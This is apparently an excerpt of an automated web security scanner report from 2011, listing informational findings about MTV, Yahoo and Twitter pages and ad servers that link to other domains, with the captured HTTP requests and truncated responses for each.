18.26. http://ad.doubleclick.net/adj/mtv.mtvi/btf_j_s/music/_mn  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/mtv.mtvi/btf_j_s/music/_mn

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adj/mtv.mtvi/btf_j_s/music/_mn;sec0=music;sec1=_mn;!category=expand;!category=float;node=survey;pos=btf;tag=adj;mtype=standard;sz=300x250;tile=3;demo=D;demo=T;demo=5840;demo=2966;demo=2907;demo=2905;demo=2904;demo=1607;demo=1299;demo=850;demo=848;demo=844;demo=827;demo=790;demo=777;demo=775;demo=774;u=!category-expand%7C!category-float%7Cnode-survey%7Cpos-btf%7Ctag-adj%7Cmtype-standard%7Csz-300x250%7Ctile-3%7Cdemo-D%7Cdemo-T%7Cdemo-5840%7Cdemo-2966%7Cdemo-2907%7Cdemo-2905%7Cdemo-2904%7Cdemo-1607%7Cdemo-1299%7Cdemo-850%7Cdemo-848%7Cdemo-844%7Cdemo-827%7Cdemo-790%7Cdemo-777%7Cdemo-775%7Cdemo-774;ord=927227632701397000? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.mtv.com/music/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 53527
Date: Tue, 14 Jun 2011 00:17:01 GMT
Expires: Tue, 14 Jun 2011 00:22:01 GMT

document.write('');

if(typeof(dartCallbackObjects) == "undefined")
var dartCallbackObjects = new Array();
if(typeof(dartCreativeDisplayManagers) == "undefined")
var dartCreativeDisplayManagers =
...[SNIP]...
66|demo-2907|demo-2905|demo-2904|demo-1607|demo-1299|demo-850|demo-848|demo-844|demo-827|demo-790|demo-777|demo-775|demo-774%3B%7Eaopt%3D2/1/c6a3/0%3B%7Esscs%3D%3fhttp://www.facebook.com/fuzebeverage"><IMG id="IMG_'+ variableName +'" SRC="http://s0.2mdn.net/1352258/PID_1577316_FuzeBanner_backup.jpg" width="300" height="250" BORDER=0 alt=""/></A>
...[SNIP]...
18.27. http://ad.doubleclick.net/adj/mtv.mtvi/btf_j_s/shows/_mn  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/mtv.mtvi/btf_j_s/shows/_mn

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adj/mtv.mtvi/btf_j_s/shows/_mn;sec0=shows;sec1=_mn;!category=mtv_hub_idx;!category=expand;!category=float;pos=btf;tag=adj;mtype=standard;sz=1x4;tile=4;demo=D;demo=T;demo=1607;demo=1299;demo=858;demo=857;demo=856;demo=850;demo=847;demo=844;demo=790;demo=777;demo=775;u=!category-mtv_hub_idx|!category-expand|!category-float|pos-btf|tag-adj|mtype-standard|sz-1x4|tile-4|demo-D|demo-T|demo-1607|demo-1299|demo-858|demo-857|demo-856|demo-850|demo-847|demo-844|demo-790|demo-777|demo-775;ord=715961970680944900? HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.mtv.com/ontv/
Cookie: id=c60bd0733000097|2703878/1001371/15138,3226301/1106615/15127|t=1297260501|et=730|cs=g_qf15ye; rsi_segs=E11178_10001

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 176
Date: Mon, 13 Jun 2011 17:46:14 GMT
Expires: Mon, 13 Jun 2011 17:51:14 GMT

document.write('');

document.write('<a target="_blank" href="http://shop.mtv.com/">Find cool stuff for all your favorite shows at the MTV Shop</a>');

document.write('');
18.28. http://ad.doubleclick.net/adj/mtv.mtvi/btf_j_s/shows/_mn  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/mtv.mtvi/btf_j_s/shows/_mn

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adj/mtv.mtvi/btf_j_s/shows/_mn;sec0=shows;sec1=_mn;!category=mtv_hub_idx;!category=expand;!category=float;pos=btf;tag=adj;mtype=standard;sz=300x250;tile=3;demo=D;demo=T;demo=1607;demo=1299;demo=858;demo=857;demo=856;demo=850;demo=847;demo=844;demo=790;demo=777;demo=775;u=!category-mtv_hub_idx|!category-expand|!category-float|pos-btf|tag-adj|mtype-standard|sz-300x250|tile-3|demo-D|demo-T|demo-1607|demo-1299|demo-858|demo-857|demo-856|demo-850|demo-847|demo-844|demo-790|demo-777|demo-775;ord=715961970680944900? HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.mtv.com/ontv/
Cookie: id=c60bd0733000097|2703878/1001371/15138,3226301/1106615/15127|t=1297260501|et=730|cs=g_qf15ye; rsi_segs=E11178_10001

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 1857
Date: Mon, 13 Jun 2011 17:46:11 GMT
Expires: Mon, 13 Jun 2011 17:51:11 GMT

document.write('<iframe src=\"http://view.atdmt.com/ULA/iview/310879587/direct/01/7156926?click=http://ad.doubleclick.net/click%3Bh%3Dv8/3b25/3/0/%2a/a%3B240473813%3B0-0%3B2%3B30559703%3B4307-300/250%
...[SNIP]...
emo-1299|demo-858|demo-857|demo-856|demo-850|demo-847|demo-844|demo-790|demo-777|demo-775%3B%7Eaopt%3D2/1/c5a3/0%3B%7Esscs%3D%3fhttp://clk.atdmt.com/ULA/go/310879587/direct/01/7156926" target="_blank"><img src="http://view.atdmt.com/ULA/view/310879587/direct/01/7156926"/></a>
...[SNIP]...
18.29. http://ad.doubleclick.net/adj/mtv.mtvi/btf_j_s/shows/teen_wolf/series  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/mtv.mtvi/btf_j_s/shows/teen_wolf/series

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adj/mtv.mtvi/btf_j_s/shows/teen_wolf/series;sec0=shows;sec1=teen_wolf;sec2=series;seriesAlias=teen_wolf;!category=teen_wolf;pos=btf;tag=adj;mtype=standard;sz=300x250;tile=3;demo=D;demo=T;demo=5840;demo=2966;demo=2907;demo=2905;demo=2904;demo=1607;demo=1299;demo=850;demo=848;demo=844;demo=827;demo=790;demo=777;demo=775;demo=774;u=seriesAlias-teen_wolf%7C!category-teen_wolf%7Cpos-btf%7Ctag-adj%7Cmtype-standard%7Csz-300x250%7Ctile-3%7Cdemo-D%7Cdemo-T%7Cdemo-5840%7Cdemo-2966%7Cdemo-2907%7Cdemo-2905%7Cdemo-2904%7Cdemo-1607%7Cdemo-1299%7Cdemo-850%7Cdemo-848%7Cdemo-844%7Cdemo-827%7Cdemo-790%7Cdemo-777%7Cdemo-775%7Cdemo-774;ord=368869381258264200? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.mtv.com/shows/teen_wolf/series.jhtml
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 38661
Date: Tue, 14 Jun 2011 00:18:22 GMT
Expires: Tue, 14 Jun 2011 00:23:22 GMT

document.write('');

if(typeof(dartCallbackObjects) == "undefined")
var dartCallbackObjects = new Array();
if(typeof(dartCreativeDisplayManagers) == "undefined")
var dartCreativeDisplayManagers =
...[SNIP]...
demo-844|demo-827|demo-790|demo-777|demo-775|demo-774%3B%7Eaopt%3D2/1/c6a3/0%3B%7Esscs%3D%3fhttp://pixel.quantserve.com/r;a=p-34ZTMMfbDmJC-;labels=_click.adserver.doubleclick*http://dresslikeaguy.com"><IMG SRC="http://s0.2mdn.net/1807268/PID_1638828_300x250.jpg" width="300" height="250" BORDER=0 alt=""></A>
...[SNIP]...
18.30. http://ad.doubleclick.net/adj/mtv.mtvi/btf_j_s/shows/teen_wolf/series  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/mtv.mtvi/btf_j_s/shows/teen_wolf/series

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adj/mtv.mtvi/btf_j_s/shows/teen_wolf/series;sec0=shows;sec1=teen_wolf;sec2=series;seriesAlias=teen_wolf;!category=teen_wolf;pos=btf;tag=adj;mtype=standard;sz=1x4;tile=4;demo=D;demo=T;demo=5840;demo=2966;demo=2907;demo=2905;demo=2904;demo=1607;demo=1299;demo=850;demo=848;demo=844;demo=827;demo=790;demo=777;demo=775;demo=774;u=seriesAlias-teen_wolf%7C!category-teen_wolf%7Cpos-btf%7Ctag-adj%7Cmtype-standard%7Csz-1x4%7Ctile-4%7Cdemo-D%7Cdemo-T%7Cdemo-5840%7Cdemo-2966%7Cdemo-2907%7Cdemo-2905%7Cdemo-2904%7Cdemo-1607%7Cdemo-1299%7Cdemo-850%7Cdemo-848%7Cdemo-844%7Cdemo-827%7Cdemo-790%7Cdemo-777%7Cdemo-775%7Cdemo-774;ord=368869381258264200? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.mtv.com/shows/teen_wolf/series.jhtml
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 176
Date: Tue, 14 Jun 2011 00:18:33 GMT
Expires: Tue, 14 Jun 2011 00:23:33 GMT

document.write('');

document.write('<a target="_blank" href="http://shop.mtv.com/">Find cool stuff for all your favorite shows at the MTV Shop</a>');

document.write('');
18.31. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.7522770736832172  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.7522770736832172

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.7522770736832172?click=http://global.ard.yahoo.com/SIG=15lkbuhbo/M=791401.14523132.14352887.12989431/D=my/S=150001785:RQ/Y=YAHOO/EXP=1307981483/L=bC9ZKmKL8NLm3NorTdAdCxM0rcHW8032GosAA2uT/B=SnIAKmKL5WA-/J=1307974283257435/K=WV.FHM_EsyZAV7OsrCOkmw/A=6304414/R=0/* HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://my.yahoo.com/;_ylt=AtqNTgBHv4UdcezC5xaY6tfTjdIF
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: i_34=8:42:26:7:0:43835:1307361203:B2; u=4dce55b134194; i_1=46:1354:804:44:0:44377:1307970673:B2|46:1354:804:44:0:44375:1307967073:B2|46:1354:804:44:0:48594:1307963457:L

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 13 Jun 2011 14:11:24 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2419

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
<NOSCRIPT><a href="http://global.ard.yahoo.com/SIG=15lkbuhbo/M=791401.14523132.14352887.12989431/D=my/S=150001785:RQ/Y=YAHOO/EXP=1307981483/L=bC9ZKmKL8NLm3NorTdAdCxM0rcHW8032GosAA2uT/B=SnIAKmKL5WA-/J=1307974283257435/K=WV.FHM_EsyZAV7OsrCOkmw/A=6304414/R=0/*http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/" target="_blank" border="0" style="border:0px;"><img border="0" style="border:0px;" src="//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.img.200x33/1307974284**;" />
...[SNIP]...
18.32. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/1307974284**  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/1307974284**

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/1307974284**;10,3,181;1920;1200;http%3A_@2F_@2Fmy.yahoo.com_@2F%3B_ylt%3DAtqNTgBHv4UdcezC5xaY6tfTjdIF?click=http://global.ard.yahoo.com/SIG=15lkbuhbo/M=791401.14523132.14352887.12989431/D=my/S=150001785:RQ/Y=YAHOO/EXP=1307981483/L=bC9ZKmKL8NLm3NorTdAdCxM0rcHW8032GosAA2uT/B=SnIAKmKL5WA-/J=1307974283257435/K=WV.FHM_EsyZAV7OsrCOkmw/A=6304414/R=0/* HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.7522770736832172?click=http://global.ard.yahoo.com/SIG=15lkbuhbo/M=791401.14523132.14352887.12989431/D=my/S=150001785:RQ/Y=YAHOO/EXP=1307981483/L=bC9ZKmKL8NLm3NorTdAdCxM0rcHW8032GosAA2uT/B=SnIAKmKL5WA-/J=1307974283257435/K=WV.FHM_EsyZAV7OsrCOkmw/A=6304414/R=0/*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: i_34=8:42:26:7:0:43835:1307361203:B2; u=4dce55b134194; i_1=46:1354:804:44:0:44377:1307970673:B2|46:1354:804:44:0:44375:1307967073:B2|46:1354:804:44:0:48594:1307963457:L

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 13 Jun 2011 14:11:25 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4dce55b134194; expires=Thu, 14-Jul-2011 14:11:25 GMT; path=/
Set-Cookie: i_1=46:1354:269:44:0:44390:1307974285:B2|46:1354:804:44:0:44390:1307974284:B2|46:1354:804:44:0:44377:1307970673:B2; expires=Thu, 14-Jul-2011 14:11:25 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 743

   function wsod_image1354() {
       document.write('<a href="http://global.ard.yahoo.com/SIG=15lkbuhbo/M=791401.14523132.14352887.12989431/D=my/S=150001785:RQ/Y=YAHOO/EXP=1307981483/L=bC9ZKmKL8NLm3NorTdAdCxM0rcHW8032GosAA2uT/B=SnIAKmKL5WA-/J=1307974283257435/K=WV.FHM_EsyZAV7OsrCOkmw/A=6304414/R=0/*http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1354.269.iframe.200x33/**;10.3181;1920;1200;http:_@2F_@2Fmy.yahoo.com_@2F;_ylt=AtqNTgBHv4UdcezC5xaY6tfTjdIF" target="_blank" title="Online $7 Trades! Click to find out more!"><img style="border:none;" src="http://admedia.wsod.com/media/8bec9b10877d5d7fd7c0fb6e6a631357/200x33_7_dNL.gif" alt="Online $7 Trades! Click to find out more!" />
...[SNIP]...
18.33. http://api.twitter.com/1/FanSided/lists//statuses.json  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://api.twitter.com
Path:   /1/FanSided/lists//statuses.json

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /1/FanSided/lists//statuses.json?callback=TWTR.Widget.receiveCallback_1&include_rts=true&clientsource=TWITTERINC_WIDGET&1307963618637=cachebust HTTP/1.1
Host: api.twitter.com
Proxy-Connection: keep-alive
Referer: http://sportdfw.com/z-the-fort-worth-four/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=43838368.1305663457.3.2.utmcsr=kosmix.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=43838368.1598605414.1305368954.1306579970.1306582526.7; k=173.193.214.243.1307962966384201; guest_id=130796296639680752; original_referer=Bm9gjDJKLkNUA6KUQhqcURlVnkat6%2FAa0nQJRijFpP696HbzgOR%2BrPDoOcSsLUsQqgRs7aQNlpGXT0Ue1ThS%2BnB2T6v43msK; _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCIoBq4gwAToHaWQiJTY3MzNhYWQwMGYwZGZh%250AM2RjMzRjNGI0YmM4ODI3OGQ2IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--e8cfadc4dddd72c57b26f1ed5cab8aa85cb06060; external_referer=Bm9gjDJKLkNUA6KUQhqcUTdiRGCASXVaz08YGXkOHWMzPBOM8BKQu4ZyXL5mG7%2BW%7C0

Response

HTTP/1.1 404 Not Found
Date: Mon, 13 Jun 2011 13:39:57 GMT
Server: hi
Status: 404 Not Found
X-Transaction: 1307972397-6790-39511
X-Frame-Options: SAMEORIGIN
Last-Modified: Mon, 13 Jun 2011 13:39:57 GMT
Content-Type: text/html; charset=utf-8
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-MID: 3905aeca8835ee134376921eac6212a971a02300
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Vary: Accept-Encoding
Content-Length: 9854
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>

...[SNIP]...
</title>
<link href="//si0.twimg.com/sticky/error_pages/favicon.ico" rel="shortcut icon" type="image/x-icon" />
<style type="text/css">
...[SNIP]...
<a href="//twitter.com"><img src="//si0.twimg.com/sticky/error_pages/twitter_logo_header.png" width="155" height="36" alt="Twitter.com" /></a>
...[SNIP]...
18.34. http://community.mtv.com/Overlays/LogIn.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.mtv.com
Path:   /Overlays/LogIn.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /Overlays/LogIn.aspx?callbackName=F13080112111260&fluxHosted=false&fbAutoLoginDisabled=true&domain=www.mtv.com HTTP/1.1
Host: community.mtv.com
Proxy-Connection: keep-alive
Referer: http://www.mtv.com/games/arcade/game/play.jhtml?arcadeGameId=10325912
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1864906649-1307963885068; mtvn_guid=1307963888-186; s_nr=1307963913916; qcDemo=demo%253DD%253Bdemo%253DT%253Bdemo%253D5840%253Bdemo%253D2966%253Bdemo%253D2907%253Bdemo%253D2905%253Bdemo%253D2904%253Bdemo%253D1607%253Bdemo%253D1299%253Bdemo%253D850%253Bdemo%253D848%253Bdemo%253D844%253Bdemo%253D827%253Bdemo%253D790%253Bdemo%253D777%253Bdemo%253D775%253Bdemo%253D774; mbox=session#1308010496673-477284#1308012624|check#true#1308010824; __cs_rr=1; adPlayCounter=1; gs_session=user_id%3D0%26day_stamp%3D15139%26site_id%3D1%26session_id%3D0ba59ab39da532eff77d95c0fb336a2b%26user_name%3D%26validation_key%3Dcbe73a9137cb8591ae079f1a2b3cc064; s_cc=true; s_sq=%5B%5BB%5D%5D; MTV_ID=209.18.38.165.1308010776270; s_ppv=65

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
Server: w02w
App: ww
P3P: CP="NON DSP COR ADM DEV PSA PSD IVA OUR BUS STA"
Cteonnt-Length: 23669
Content-Length: 23669
Date: Tue, 14 Jun 2011 00:27:49 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: IsMasterAuthResponse=false; expires=Mon, 25-Aug-2008 19:01:02 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
</script>
<link href="http://static0.fluxstatic.com/-/Clients/Common/Css/Customize.css?151620" rel="stylesheet" type="text/css" id="806041590" /><link href="http://static0.fluxstatic.com/-/Clients/Common/Css/Css25.css?151620" rel="stylesheet" type="text/css" id="1739308185" /><link href="http://static0.fluxstatic.com/-/Clients/MTVcommunity/Css/css25.css?634302460579770000" rel="stylesheet" type="text/css" id="1313454312" /></head>
...[SNIP]...
</script>


<script src="http://t.flux.com/Clients/JS/FT.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://static0.fluxstatic.com/-/Clients/Common/JS/Common/Prototype.js?77125b10" type="text/javascript"></script>
<script src="http://static2.fluxstatic.com/-/Clients/Common/JS/Common/prototype.box.js?772645fd" type="text/javascript"></script>
<script src="http://static0.fluxstatic.com/-/Clients/Common/JS/Common/WebControl.js?772b0733" type="text/javascript"></script>
<script src="http://static2.fluxstatic.com/-/Clients/Common/JS/Common/AjaxBaseControl.js?772b0733" type="text/javascript"></script>
<script src="http://static3.fluxstatic.com/-/Clients/Common/JS/Common/AjaxBasePage.js?772999d2" type="text/javascript"></script>
<script src="http://static0.fluxstatic.com/-/Clients/Common/JS/Controls/ButtonControl.js?7622b7ab" type="text/javascript"></script>
<script src="http://static3.fluxstatic.com/-/Clients/Common/JS/Controls/PrefilledTextBox.js?761f2727" type="text/javascript"></script>
<script src="http://connect.facebook.net/en_US/all.js" type="text/javascript"></script>
<script src="http://static0.fluxstatic.com/-/Clients/Common/JS/Common/Overlay.js?7724a69c" type="text/javascript"></script>
<script src="http://static3.fluxstatic.com/-/Clients/Common/JS/Common/RoadBlocker.js?7724a69c" type="text/javascript"></script>
<script src="http://static2.fluxstatic.com/-/Clients/Common/JS/Common/ContentJumpOverlay.js?77125b10" type="text/javascript"></script>
<script src="http://static2.fluxstatic.com/-/Clients/Common/JS/Common/IFrameResizer.js?77125b10" type="text/javascript"></script>
<script src="http://static1.fluxstatic.com/-/Clients/Common/JS/Controls/OverlayPanel.js?7636d0b0" type="text/javascript"></script>
<script src="http://static2.fluxstatic.com/-/Clients/Common/JS/Controls/ValidationManager.js?7622b7ab" type="text/javascript"></script>
<script src="http://static1.fluxstatic.com/-/Clients/Common/JS/Common/GoogleTracker.js?772645fd" type="text/javascript"></script>
...[SNIP]...
</script>


   <script src="http://widgetsak.flux.com/Runtime.js" type="text/javascript"></script>
   <script src="http://widgetsak.flux.com/Context.js?communityUcid=D3FCFFFF0002D51D0002FFFFFCD3" type="text/javascript"></script>
   
   <script src="http://widgets3.flux.com/Loader" type="text/javascript" id="D3FCFFFF0002D51D0002FFFFFCD3"></script>
...[SNIP]...
<p class="smallText">This site is&nbsp;<img src="http://static0.fluxstatic.com/-/Clients/Common/Img/Icons/newInFlux.png" class="inFluxLogo" />&nbsp; <a href="http://www.flux.com" target="_blank">What is Flux?</a>
...[SNIP]...
<td style="padding-right: 10px"><img src="http://static3.fluxstatic.com/-/Clients/common/img/_.gif" id="contentJumpOverlayImage" class="thumbnailSize50x50" /></td>
...[SNIP]...
18.35. https://edit.yahoo.com/forgotroot  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://edit.yahoo.com
Path:   /forgotroot

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /forgotroot?done=https%3A%2F%2Flogin.yahoo.com%2Fconfig%2Fvalidate%3F.src%3Dflickrsignin%26.pc%3D8190%26.scrumb%3D0%26.pd%3Dc%253DJvVF95K62e6PzdPu7MBv2V8-%26.intl%3Dus%26.done%3Dhttp%253A%252F%252Fwww.flickr.com%252Fsignin%252Fyahoo%252F%253Fredir%253D%25252Fphoto_grease_postlogin.gne%25253Fd%25253Dhttp%25253A%25252F%25252Fwww.flickr.com%25252Freport_abuse.gne&src=flickrsignin&partner=&intl=us HTTP/1.1
Host: edit.yahoo.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: B=edn6q5d6t078b&b=3&s=vv; CH=AgBN5uYQADlWEAA1WxAALXwQAC0hEAAhWRAAM70QADEpEAA6vhAABx4QABKh; ALP=bTowJmw6ZW5fVVMm

Response

HTTP/1.1 200 OK
Date: Tue, 14 Jun 2011 00:25:24 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Expires: Thu, 01 Jan 1970 12:34:56 GMT
Cache-Control: no-store, no-cache, must-revalidate, private
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13350

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta http_equiv=
...[SNIP]...
</title>
<link rel="stylesheet" type="text/css" media="screen" href="https://s.yimg.com/lq/lib/common/css/reset-fonts-grids_2.1.2.css">
<style type="text/css">
...[SNIP]...
<!-- intl = us, spaceid = 150002288 offset = 0 position = HEAD -->
<link type="text/css" rel="stylesheet" href="https://s.yimg.com/lq/lib/uh/15/css/uh_slim_ssl-1.0.7.css"><style type="text/css">
...[SNIP]...
